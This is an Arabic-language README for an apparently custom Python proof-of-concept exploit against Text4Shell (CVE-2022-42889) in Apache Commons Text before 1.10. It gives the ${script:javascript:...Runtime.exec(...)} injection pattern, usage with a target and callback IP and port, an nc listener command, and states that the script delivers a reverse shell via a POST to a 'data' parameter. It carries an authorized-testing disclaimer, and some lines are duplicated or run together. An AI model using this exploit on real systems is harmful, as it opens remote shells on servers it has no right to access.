
أداة استغلال (PoC) مخصصة مبنية على بايثون تستهدف Text4Shell (CVE-2022-42889)، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد في Apache Commons Text الإصدارات < 1.10.
استغلال إثبات مفهوم (PoC) مخصص مبني على بايثون يستهدف Text4Shell (CVE-2022-42889)، وهي ثغرة حرجة لتنفيذ الأكواد عن بُعد في Apache Commons Text الإصدارات < 1.10.
يستهدف هذا الاستغلال تطبيقات Java المعرضة للخطر التي تستخدم فئة StringSubstitutor مع تفعيل الاستيفاء (interpolation)، مما يسمح بحقن تعبيرات ${script:...} لتنفيذ أوامر نظام عشوائية.
في هذا الإثبات (PoC)، يتم توضيح الاستغلال عبر معامل الاستعلام data؛ ومع ذلك، قد يختلف اسم المعامل المعرض للخطر اعتمادًا على التنفيذ. يجب على المستخدمين تكييف الحمولة (payload) ومسار الطلب وفقًا لمنطق التطبيق المستهدف.
إخلاء مسؤولية: يُقدَّم هذا الاستغلال لأغراض تعليمية واختبار الاختراق المصرح به فقط. استخدمه بمسؤولية وعلى مسؤوليتك الخاصة.
هذا استغلال Python3 مخصص لثغرة Apache Commons Text المعروفة باسم Text4Shell (CVE-2022-42889). يتيح تنفيذ الأكواد عن بُعد (RCE) عبر أدوات الاستيفاء غير الآمنة عندما يتم تقييم مدخلات المستخدم ديناميكيًا بواسطة StringSubstitutor.
تم اختباره ضد:
${script:...} على مدخلات غير موثوقةpython3 text4shell.py <target_ip> <callback_ip> <callback_port>
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
nc -nlvp 4444
يقوم السكريبت بحقن:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
يتم إرسال الريل شل (reverse shell) عبر معامل /data باستخدام طلب POST.